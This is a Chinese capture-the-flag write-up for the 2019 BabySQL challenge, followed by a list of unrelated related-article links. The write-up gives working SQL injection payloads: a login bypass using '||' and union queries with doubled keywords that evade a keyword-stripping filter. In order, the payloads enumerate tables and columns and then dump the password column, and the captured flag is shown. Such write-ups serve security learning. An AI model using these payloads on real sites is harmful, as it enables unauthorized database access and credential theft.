[极客大挑战 2019]BabySQL 1新手解题过程

1、使用万能密码登录

显示错误,而且or好像是被过滤了

将or换为||,登录成功

2、查询字段个数,由于存在or过滤,所以无法使用order by 来判断,因此采用拼接字符绕过,进行联合查询

复制代码
?username=admin&password=admin' uunionnion sselectelect 1,2,3%23

3、查表

复制代码
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

4、查询表字段

复制代码
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

5、爆破数据

复制代码
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23
复制代码
flag{efd91e9e-a5e3-47ee-acc1-ccd6aef806b9}
相关推荐
蓝胖子酱1 分钟前
在 Electron 中用 electron-store 实现加密存储与自定义格式文件
前端·javascript·数据库
snow@li1 小时前
Redis:数据库语法速查表 / 全景梳理
数据库·redis·缓存
Devlive 开源社区1 小时前
Nebula 1.6.0 发布:跨区域桶自动路由、秒传、文本/PDF 预览一次到位
数据库·sql
这个DBA有点耶1 小时前
导个数据中文全变问号?字符集这事儿真没那么简单
数据库·mysql·代码规范
wuqingshun3141592 小时前
MYSQL中如果发生死锁应该如何解决?
数据库·mysql
DO_Community2 小时前
Weaviate 托管数据库现已在 DigitalOcean 上开放公测
数据库·人工智能·开源·向量数据库·weaviate
数据知道2 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
报错小能手2 小时前
索引常见面试题
数据库
Gyr02 小时前
关于证书站捡洞这一档事
安全·web安全
Database_Cool_2 小时前
时序数据库选型:阿里云 Lindorm 时序引擎 vs InfluxDB 全维度对比
数据库·阿里云·时序数据库